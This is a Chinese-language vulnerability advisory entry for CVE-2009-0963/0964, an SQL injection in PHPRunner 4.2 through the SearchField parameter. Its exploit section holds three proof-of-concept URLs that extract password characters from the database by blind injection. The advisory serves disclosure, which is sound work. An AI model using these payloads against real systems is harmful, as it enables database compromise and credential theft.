添加时间:
2009-03-27

系统编号:
WAVDB-01361
BugCVE: CVE-2009-0963 CVE-2009-0964
BUGTRAQ: 34146

影响版本:
PHPRunner 4.2

程序介绍:

PHPRunner是一款PHP网页制作工具，可以生成读写MySql数据库的PHP网页。

漏洞分析:

PHPRunner的orders_list.php和users_list.php模块中没有正确地验证对SearchField参数所传送的输入便在SQL查询中使用，远程攻击者可以通过提交恶意查询请求执行SQL注入攻击，完全入侵数据库系统。

漏洞利用:

http://example.com/output/UserView_list.php?a=search&value=1&SearchFor=abc&SearchOption=Contains&SearchField=Password like   '%%')--
http://example.com/output/UserView_list.php?a=search&value=1&SearchFor=abc&SearchOption=Contains&SearchField=mid(Password,1,1)='a')-- \
http://example.com/output/UserView_list.php?a=search&value=1&SearchFor=abc&SearchOption=Contains&SearchField=mid(Password,1,2)='ab')--

解决方案:
厂商补丁：
XLineSoft
---------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：
http://www.xlinesoft.com/

信息来源:
<*来源：AmnPardaz Security Research & Penetration Testing Group （WwW.BugReport.ir）

链接：http://secunia.com/advisories/34330/
http://marc.info/?l=bugtraq&m=123731019502458&w=2
*>